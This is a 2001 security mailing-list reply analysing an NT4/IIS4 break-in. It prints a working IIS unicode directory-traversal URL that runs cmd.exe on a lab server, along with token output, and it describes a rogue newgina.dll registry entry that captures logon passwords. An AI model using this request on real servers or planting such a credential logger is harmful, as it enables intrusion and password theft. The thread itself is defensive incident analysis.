Security Incidents mailing list archives

Re: Some details in a recent NT hack we encountered

From: Matt Scarborough <vexversa () USA NET>
Date: Sun, 25 Feb 2001 15:18:08 EST

On Wed, 28 Feb 2001 21:48:23 +0000, Gossi The Dog <gossi () OWNED LAB6 COM>
wrote:

First off, the IIS unicode exploit does not give you SYSTEM or
Administrator privs.  So how are they getting those (they'll need them to
make those dirs and set permissions etc).


Using David LeBlanc's DumpTokenInfo, to "dumps the information from a process
token," view the output below. Any misinterpretation of Mr. LeBlanc's code is
my fault, not his.

Understanding Process Tokens
http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=15989

When I say default below, I mean you grab the floppies and install NT4 and
grab the Option Pack and install IIS4. Sadly, this happens too often. And then
this default box gets plugged into the Internet.

Default IIS4 is on default NT4 at 192.168.1.65. 

C:\INETPUB\SCRIPTS\TEST.CMD is
CMD /C "DumpTokenInfo.exe >dump.txt"

we do from some other box
http://192.168.1.65/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+test

and then view the contents of C:\INETPUB\SCRIPTS\DUMP.TXT

Token Owner: ANTARCTICA\IUSR_ANTARCTICA - User
Token Primary Group: ANTARCTICA\None - Group
Token Default DACL:
Access Allowed for:
ANTARCTICA\IUSR_ANTARCTICA - User
All access
Access Allowed for:
NT AUTHORITY\SYSTEM - Well-known group
All access
Token Source: IIS
Token type: Primary Token
Token is not an impersonation token

Secondly, what program is generating those WinLogon logs?  Not seen that
before at all, very interesting.


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
"GinaDLL"
Type: REG_SZ
Data: newgina.dll

NewGina.DLL replaces MSGina.DLL with a hacked (to say the least) version.

As such, activities like the SAS (CTRL+ALT+DEL) are passed by WinLogon as
WlxLoggedOnSAS to the rogue NewGina.DLL. Username and passwords for local
logons could be saved to a file or E-mailed to an attacker across the globe.

erm, eek.


Exactly.

Matt 2001-02-25

____________________________________________________________________
Get free email and a permanent address at http://www.amexmail.com/?A=1

Current thread:

Some details in a recent NT hack we encountered Ron Grove (Feb 24)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 24)
- <Possible follow-ups>
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
  - Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
- Re: Some details in a recent NT hack we encountered Ron Grove (Feb 25)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 27)
  - Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 28)